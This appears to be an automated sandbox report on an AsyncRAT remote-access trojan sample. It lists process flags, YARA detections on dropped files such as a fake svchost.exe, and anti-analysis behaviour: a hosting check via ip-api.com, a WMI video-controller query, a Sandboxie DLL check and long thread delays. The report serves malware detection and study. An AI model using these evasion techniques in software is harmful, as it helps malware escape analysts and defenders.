                          Source: C:\Windows\System32\svchost.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\svchost.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\svchost.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\svchost.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\svchost.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\svchost.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                          Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                          Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                          Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                          Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                          Source: C:\Windows\System32\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                          Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                          Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                          Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                          Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                          Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX

                          Malware Analysis System Evasion

                          barindex
                          Yara detected AsyncRAT
                          Source: Yara matchFile source: 2.0.not rat.exe.df0000.0.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 0.2.sDKRz09zM7.exe.3059b50.1.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 0.2.sDKRz09zM7.exe.3064190.2.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 0.2.sDKRz09zM7.exe.3064190.2.raw.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 0.2.sDKRz09zM7.exe.3059b50.1.raw.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 00000000.00000002.1366284151.0000000003041000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                          Source: Yara matchFile source: 00000002.00000000.1363070453.0000000000DF2000.00000002.00000001.01000000.00000006.sdmp, type: MEMORY
                          Source: Yara matchFile source: Process Memory Space: sDKRz09zM7.exe PID: 7316, type: MEMORYSTR
                          Source: Yara matchFile source: C:\Users\user\AppData\Roaming\svchost.exe, type: DROPPED
                          Source: Yara matchFile source: C:\Users\user\AppData\Roaming\not rat.exe, type: DROPPED
                          Check if machine is in data center or colocation facility
                          Source: global trafficHTTP traffic detected: GET /line/?fields=hosting HTTP/1.1Host: ip-api.comConnection: Keep-Alive
                          Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
                          Source: C:\Users\user\AppData\Roaming\not rat.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
                          Source: C:\Users\user\AppData\Roaming\not rat.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
                          Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
                          Source: not rat.exe, 00000002.00000002.2621953796.0000000003081000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: SBIEDLL.DLL
                          Source: sDKRz09zM7.exe, 00000000.00000002.1366284151.0000000003041000.00000004.00000800.00020000.00000000.sdmp, not rat.exe, 00000002.00000000.1363070453.0000000000DF2000.00000002.00000001.01000000.00000006.sdmp, not rat.exe.0.dr, svchost.exe.2.drBinary or memory string: SBIEDLL.DLLINFO
                          Source: C:\Users\user\Desktop\sDKRz09zM7.exeMemory allocated: 1350000 memory reserve | memory write watchJump to behavior
                          Source: C:\Users\user\Desktop\sDKRz09zM7.exeMemory allocated: 1B040000 memory reserve | memory write watchJump to behavior
                          Source: C:\Users\user\AppData\Roaming\not rat.exeMemory allocated: 1420000 memory reserve | memory write watchJump to behavior
                          Source: C:\Users\user\AppData\Roaming\not rat.exeMemory allocated: 1B080000 memory reserve | memory write watchJump to behavior
                          Source: C:\Users\user\AppData\Roaming\BootstrapperV1.23_ModdedByHisako.exeMemory allocated: 22ECA150000 memory reserve | memory write watchJump to behavior
                          Source: C:\Users\user\AppData\Roaming\BootstrapperV1.23_ModdedByHisako.exeMemory allocated: 22EE3A40000 memory reserve | memory write watchJump to behavior
                          Source: C:\Users\user\AppData\Roaming\svchost.exeMemory allocated: 1490000 memory reserve | memory write watch
                          Source: C:\Users\user\AppData\Roaming\svchost.exeMemory allocated: 1490000 memory reserve | memory write watch
                          Source: C:\Users\user\AppData\Roaming\svchost.exeMemory allocated: 2CE0000 memory reserve | memory write watch
                          Source: C:\Users\user\AppData\Roaming\svchost.exeMemory allocated: 1ACE0000 memory reserve | memory write watch
                          Source: C:\Users\user\AppData\Roaming\svchost.exeMemory allocated: 2930000 memory reserve | memory write watch
                          Source: C:\Users\user\AppData\Roaming\svchost.exeMemory allocated: 1AA40000 memory reserve | memory write watch
                          Source: C:\Users\user\AppData\Roaming\svchost.exeMemory allocated: 1780000 memory reserve | memory write watch
                          Source: C:\Users\user\AppData\Roaming\svchost.exeMemory allocated: 1B3A0000 memory reserve | memory write watch
                          Source: C:\Users\user\Desktop\sDKRz09zM7.exeThread delayed: delay time: 922337203685477Jump to behavior
                          Source: C:\Users\user\AppData\Roaming\not rat.exeThread delayed: delay time: 922337203685477Jump to behavior
                          Source: C:\Users\user\AppData\Roaming\BootstrapperV1.23_ModdedByHisako.exeThread delayed: delay time: 922337203685477Jump to behavior
                          Source: C:\Users\user\AppData\Roaming\BootstrapperV1.23_ModdedByHisako.exeThread delayed: delay time: 600000Jump to behavior
                          Source: C:\Users\user\AppData\Roaming\BootstrapperV1.23_ModdedByHisako.exeThread delayed: delay time: 599875Jump to behavior
                          Source: C:\Users\user\AppData\Roaming\BootstrapperV1.23_ModdedByHisako.exeThread delayed: delay time: 599766Jump to behavior
                          Source: C:\Users\user\AppData\Roaming\BootstrapperV1.23_ModdedByHisako.exeThread delayed: delay time: 599628Jump to behavior
                          Source: C:\Users\user\AppData\Roaming\BootstrapperV1.23_ModdedByHisako.exeThread delayed: delay time: 599500Jump to behavior
                          Source: C:\Users\user\AppData\Roaming\BootstrapperV1.23_ModdedByHisako.exeThread delayed: delay time: 599391Jump to behavior
                          Source: C:\Users\user\AppData\Roaming\BootstrapperV1.23_ModdedByHisako.exeThread delayed: delay time: 599281Jump to behavior
                          Source: C:\Users\user\AppData\Roaming\BootstrapperV1.23_ModdedByHisako.exeThread delayed: delay time: 599162Jump to behavior
                          Source: C:\Users\user\AppData\Roaming\BootstrapperV1.23_ModdedByHisako.exeThread delayed: delay time: 599047Jump to behavior
                          Source: C:\Users\user\AppData\Roaming\BootstrapperV1.23_ModdedByHisako.exeThread delayed: delay time: 598937Jump to behavior
                          Source: C:\Users\user\AppData\Roaming\BootstrapperV1.23_ModdedByHisako.exeThread delayed: delay time: 598828Jump to behavior
                          Source: C:\Users\user\AppData\Roaming\BootstrapperV1.23_ModdedByHisako.exeThread delayed: delay time: 598719Jump to behavior
                          Source: C:\Users\user\AppData\Roaming\BootstrapperV1.23_ModdedByHisako.exeThread delayed: delay time: 598610Jump to behavior
                          Source: C:\Users\user\AppData\Roaming\BootstrapperV1.23_ModdedByHisako.exeThread delayed: delay time: 598500Jump to behavior
                          Source: C:\Users\user\AppData\Roaming\BootstrapperV1.23_ModdedByHisako.exeThread delayed: delay time: 598390Jump to behavior
                          Source: C:\Users\user\AppData\Roaming\BootstrapperV1.23_ModdedByHisako.exeThread delayed: delay time: 598278Jump to behavior
                          Source: C:\Users\user\AppData\Roaming\BootstrapperV1.23_ModdedByHisako.exeThread delayed: delay time: 598150Jump to behavior
                          Source: C:\Users\user\AppData\Roaming\BootstrapperV1.23_ModdedByHisako.exeThread delayed: delay time: 598036Jump to behavior
                          Source: C:\Users\user\AppData\Roaming\BootstrapperV1.23_ModdedByHisako.exeThread delayed: delay time: 597802Jump to behavior
                          Source: C:\Users\user\AppData\Roaming\BootstrapperV1.23_ModdedByHisako.exeThread delayed: delay time: 597532Jump to behavior
                          Source: C:\Users\user\AppData\Roaming\BootstrapperV1.23_ModdedByHisako.exeThread delayed: delay time: 597404Jump to behavior
                          Source: C:\Users\user\AppData\Roaming\BootstrapperV1.23_ModdedByHisako.exeThread delayed: delay time: 597294Jump to behavior
                          Source: C:\Users\user\AppData\Roaming\BootstrapperV1.23_ModdedByHisako.exeThread delayed: delay time: 597187Jump to behavior
                          Source: C:\Users\user\AppData\Roaming\BootstrapperV1.23_ModdedByHisako.exeThread delayed: delay time: 597078Jump to behavior
                          Source: C:\Users\user\AppData\Roaming\BootstrapperV1.23_ModdedByHisako.exeThread delayed: delay time: 596969Jump to behavior
                          Source: C:\Users\user\AppData\Roaming\BootstrapperV1.23_ModdedByHisako.exeThread delayed: delay time: 596860Jump to behavior
                          Source: C:\Users\user\AppData\Roaming\BootstrapperV1.23_ModdedByHisako.exeThread delayed: delay time: 596735Jump to behavior
                          Source: C:\Users\user\AppData\Roaming\BootstrapperV1.23_ModdedByHisako.exeThread delayed: delay time: 596610Jump to behavior
                          Source: C:\Users\user\AppData\Roaming\BootstrapperV1.23_ModdedByHisako.exeThread delayed: delay time: 596485Jump to behavior
                          Source: C:\Users\user\AppData\Roaming\BootstrapperV1.23_ModdedByHisako.exeThread delayed: delay time: 596360Jump to behavior
                          Source: C:\Users\user\AppData\Roaming\BootstrapperV1.23_ModdedByHisako.exeThread delayed: delay time: 596235Jump to behavior
                          Source: C:\Users\user\AppData\Roaming\BootstrapperV1.23_ModdedByHisako.exeThread delayed: delay time: 596110Jump to behavior
                          Source: C:\Users\user\AppData\Roaming\BootstrapperV1.23_ModdedByHisako.exeThread delayed: delay time: 595985Jump to behavior
                          Source: C:\Users\user\AppData\Roaming\BootstrapperV1.23_ModdedByHisako.exeThread delayed: delay time: 595863Jump to behavior
                          Source: C:\Users\user\AppData\Roaming\BootstrapperV1.23_ModdedByHisako.exeThread delayed: delay time: 595735Jump to behavior
                          Source: C:\Users\user\AppData\Roaming\BootstrapperV1.23_ModdedByHisako.exeThread delayed: delay time: 595610Jump to behavior
                          Source: C:\Users\user\AppData\Roaming\BootstrapperV1.23_ModdedByHisako.exeThread delayed: delay time: 595485Jump to behavior
                          Source: C:\Users\user\AppData\Roaming\BootstrapperV1.23_ModdedByHisako.exeThread delayed: delay time: 595360Jump to behavior
                          Source: C:\Users\user\AppData\Roaming\BootstrapperV1.23_ModdedByHisako.exeThread delayed: delay time: 595235Jump to behavior
                          Source: C:\Users\user\AppData\Roaming\BootstrapperV1.23_ModdedByHisako.exeThread delayed: delay time: 594880Jump to behavior
                          Source: C:\Users\user\AppData\Roaming\BootstrapperV1.23_ModdedByHisako.exeThread delayed: delay time: 594750Jump to behavior
                          Source: C:\Users\user\AppData\Roaming\BootstrapperV1.23_ModdedByHisako.exeThread delayed: delay time: 594641Jump to behavior
                          Source: C:\Users\user\AppData\Roaming\BootstrapperV1.23_ModdedByHisako.exeThread delayed: delay time: 594516Jump to behavior
                          Source: C:\Users\user\AppData\Roaming\BootstrapperV1.23_ModdedByHisako.exeThread delayed: delay time: 594406Jump to behavior
                          Source: C:\Users\user\AppData\Roaming\BootstrapperV1.23_ModdedByHisako.exeThread delayed: delay time: 594297Jump to behavior
                          Source: C:\Users\user\AppData\Roaming\BootstrapperV1.23_ModdedByHisako.exeThread delayed: delay time: 594188Jump to behavior
                          Source: C:\Users\user\AppData\Roaming\BootstrapperV1.23_ModdedByHisako.exeThread delayed: delay time: 594063Jump to behavior
                          Source: C:\Users\user\AppData\Roaming\BootstrapperV1.23_ModdedByHisako.exeThread delayed: delay time: 593938Jump to behavior
                          Source: C:\Users\user\AppData\Roaming\BootstrapperV1.23_ModdedByHisako.exeThread delayed: delay time: 593813Jump to behavior
                          Source: C:\Users\user\AppData\Roaming\BootstrapperV1.23_ModdedByHisako.exeThread delayed: delay time: 593703Jump to behavior
                          Source: C:\Users\user\AppData\Roaming\BootstrapperV1.23_ModdedByHisako.exeThread delayed: delay time: 593594Jump to behavior
                          Source: C:\Users\user\AppData\Roaming\BootstrapperV1.23_ModdedByHisako.exeThread delayed: delay time: 593469Jump to behavior
                          Source: C:\Users\user\AppData\Roaming\BootstrapperV1.23_ModdedByHisako.exeThread delayed: delay time: 593359Jump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                          Source: C:\Users\user\AppData\Roaming\svchost.exeThread delayed: delay time: 922337203685477
                          Source: C:\Users\user\AppData\Roaming\svchost.exeThread delayed: delay time: 922337203685477
                          Source: C:\Users\user\AppData\Roaming\svchost.exeThread delayed: delay time: 922337203685477
                          Source: C:\Users\user\AppData\Roaming\not rat.exeWindow / User API: threadDelayed 3433Jump to behavior
                          Source: C:\Users\user\AppData\Roaming\not rat.exeWindow / User API: threadDelayed 6410Jump to behavior
                          Source: C:\Users\user\AppData\Roaming\BootstrapperV1.23_ModdedByHisako.exeWindow / User API: threadDelayed 5643Jump to behavior
                          Source: C:\Users\user\AppData\Roaming\BootstrapperV1.23_ModdedByHisako.exeWindow / User API: threadDelayed 4158Jump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 7218Jump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 2503Jump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 8034
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1432
